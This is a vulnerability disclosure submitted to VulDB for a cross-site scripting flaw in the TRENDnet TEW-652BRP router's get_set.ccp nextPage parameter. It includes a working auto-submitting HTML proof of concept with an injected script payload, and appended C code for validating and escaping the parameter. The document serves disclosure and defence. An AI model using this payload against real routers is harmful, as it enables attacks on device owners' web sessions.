Submit #78681: An XSS on TRENDnet router TEW-652BRP

Title: An XSS on TRENDnet router TEW-652BRP

Description:

# XSS on TRENDnet router TEW-652BRP

## Overview

* Type: XSS
* Supplier: TRENDNet (https://www.trendnet.com/)
* Product: TRENDNet TEW-652BRP (Version v3.2R, https://www.trendnet.com/support/support-detail.asp?prod=235_TEW-652BRP)
* Firmware download: https://downloads.trendnet.com/tew-652brp_v3.2/firmware/fw_tew-652brp_v3(3.04b01).zip
* Affected version: latest version 3.04B01
* Bug URL: http://192.168.10.1/get_set.ccp

## Description

An XSS vulnerability exists in a parameter of a POST request, which is triggered after logging in to the web interface. The device uses a plaintext password to log in to the web interface, so it's easy to leak passwords from the HTTP flow. This vulnerability can be exploited easily.

## Reproduce and PoC

### Steps to Reproduce

I have put the PoC (HTML code) in the next section. You need to configure the device's web IP address in the URL. Log in to the web management interface in the browser, then open the PoC on a new page, and an alert will pop up.

Note: The alert window flashes before going to the next page, so I suggest using a Burp Suite proxy to slow down the speed. You can also check the response to locate the XSS injection.

### Proof of Concept

Below is the PoC (HTML code). Save the code into a file (xss.html) and open it in the browser after logging in to the target's web interface.

```
<!DOCTYPE html>
<html>
<head>
  <script>
    window.onload = function() {
      document.getElementById("postsubmit").click();
    }
  </script>
  <meta charset="utf-8">
  <title></title>
</head>
<body>
  <form method="post" action="http://192.168.10.1/get_set.ccp">
    <input id="ccp_act" type="text" name="ccp_act" value="set"/>
    <input id="ccpSubEvent" type="text" name="ccpSubEvent" value="CCP_SUB_URLFILTER"/>
    <input id="nextPage" type="text" name="nextPage" value="domain_filter.htm');alert('XSS');//"/>
    <input id="urlFilterList_ManagedURL_1.1.2.0.0" type="text" name="urlFilterList_ManagedURL_1.1.2.0.0" value="dummy.org"/>
    <input id="postsubmit" type="submit" value="submit" />
  </form>
</body>
</html>
```
User: leetsun (UID 39457)
Submission: 01/27/2023 14:06 (3 years ago)
Moderation: 02/02/2023 09:10 (6 days later)
Status: Accepted
VulDB entry: 220019 [TRENDnet TEW-652BRP 3.04b01 Web Management Interface get_set.ccp nextPage cross site scripting]
Points: 17
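The fix for the `nextPage` issue reported above is to validate the value and to encode it for the context it is written into. The following C sketch is an added example, not code from the submission or from TRENDnet's firmware. It assumes the value is reflected into a single-quoted JavaScript string (as the `');` in the PoC value suggests); the function names, the `location.replace()` sink and the `index.htm` fallback are hypothetical.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumption: nextPage only ever names a local page such as
 * "domain_filter.htm": [A-Za-z0-9_-]+ then ".htm" or ".html", max 64 bytes. */
int is_safe_next_page(const char *v)
{
    const char *dot;
    size_t i, len;
    if (v == NULL || (len = strlen(v)) == 0 || len > 64) return 0;
    dot = strrchr(v, '.');
    if (dot == NULL || dot == v) return 0;
    if (strcmp(dot, ".htm") != 0 && strcmp(dot, ".html") != 0) return 0;
    for (i = 0; i < (size_t)(dot - v); i++) {
        unsigned char c = (unsigned char)v[i];
        if (!isalnum(c) && c != '_' && c != '-') return 0;
    }
    return 1;
}

/* Defence in depth: encode for a JavaScript string literal. Every byte
 * outside [A-Za-z0-9_.-] becomes \xHH. Returns length, or -1 if out is too small. */
int js_string_escape(const char *in, char *out, size_t outsz)
{
    size_t o = 0;
    if (outsz == 0) return -1;
    for (; *in; in++) {
        unsigned char c = (unsigned char)*in;
        int plain = isalnum(c) || c == '_' || c == '.' || c == '-';
        if (o + (plain ? 1u : 4u) + 1 > outsz) return -1;
        if (plain) out[o++] = (char)c;
        else { snprintf(out + o, 5, "\\x%02X", c); o += 4; }
    }
    out[o] = '\0';
    return (int)o;
}

/* Hypothetical response builder; the location.replace() sink and the
 * "index.htm" fallback are assumptions, not taken from the firmware. */
int render_redirect(const char *next_page, char *out, size_t outsz)
{
    char esc[4 * 64 + 1];
    const char *target = is_safe_next_page(next_page) ? next_page : "index.htm";
    if (js_string_escape(target, esc, sizeof esc) < 0) return -1;
    int n = snprintf(out, outsz, "<script>location.replace('%s');</script>", esc);
    return (n < 0 || (size_t)n >= outsz) ? -1 : n;
}

int main(void) { char b[128]; if (render_redirect("domain_filter.htm", b, sizeof b) > 0) puts(b); return 0; }
```

The allowlist rejects the PoC value outright, and the escaping step keeps quotes and parentheses inert even if the allowlist is later loosened.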